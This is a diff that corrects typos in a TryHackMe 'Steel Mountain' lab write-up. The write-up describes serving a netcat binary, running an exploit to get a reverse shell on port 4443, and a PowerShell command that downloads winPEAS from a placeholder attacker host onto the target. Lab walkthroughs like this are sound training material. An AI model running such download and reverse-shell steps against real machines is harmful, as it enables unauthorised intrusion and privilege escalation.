deusx7/deusx7.github.io/Posts/TryHackMe_Writeups/Writeups/Steel_Mountain/Steel_Mountain.md

 ![](attachments/4f4ee69bfe895cf3acbc23913a5d199e_MD5.png)

 Next step is to start a python server in the directory as our netcat binary.
-When the exploit is ran it will need a server hosting the file in order to transfer it to the target machine.
-We will then run the exploit a second time to execute the file and gain a shell once our netcat listener is set to that the specified port which in my case was **4443** in order catch the shell.
+When the exploit is run it will need a server hosting the file in order to transfer it to the target machine.
+We will then run the exploit a second time to execute the file and gain a shell once our netcat listener is set to the specified port which in my case was **4443** in order to catch the shell.

 ![](attachments/20230913141304.png)
-Next step is to transfer a winPEAS script to autotmate our Privilege Escalation Enumeration and then run the script.
+Next step is to transfer a winPEAS script to automate our Privilege Escalation Enumeration and then run the script.

-Command to transfer the script form our attack machine to our target machine:
+Command to transfer the script from our attack machine to our target machine:
 ```powershell
 powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://<IP>:<PORT>/winPEASx64.exe', 'C:\\Windows\temp\winPEASx64.exe')"
 ```